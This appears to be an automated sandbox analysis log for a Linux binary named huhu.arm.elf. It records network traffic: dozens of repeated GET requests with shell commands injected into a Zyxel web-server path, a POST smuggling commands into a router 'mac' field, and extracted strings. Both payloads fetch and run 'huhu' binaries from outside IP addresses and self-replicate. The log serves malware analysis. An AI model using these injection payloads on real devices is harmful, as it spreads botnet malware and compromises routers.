            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 684X-Iinfo: 7-4111722-0 0NNN RT(1706508279475 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 37 2d 34 31 31 31 37 32 32 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 36 35 30 38 32 37 39 34 37 35 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 39 39 35 30 37 31 31 35 36 35 32 36 33 33 30 33 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 39 39 35 30 37 31 31 35 36 35 32 36 33 33 30 33 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=7-4111722-0%200NNN%20RT%281706508279475%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-19950711565263303&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-19950711565263303</iframe></body></html>
            Source: huhu.arm.elfString found in binary or memory: http://103.245.236.146/huhu.mips;$
            Source: huhu.arm.elfString found in binary or memory: http://45.142.182.123/huhu.mpsl;
            Source: huhu.arm.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: huhu.arm.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
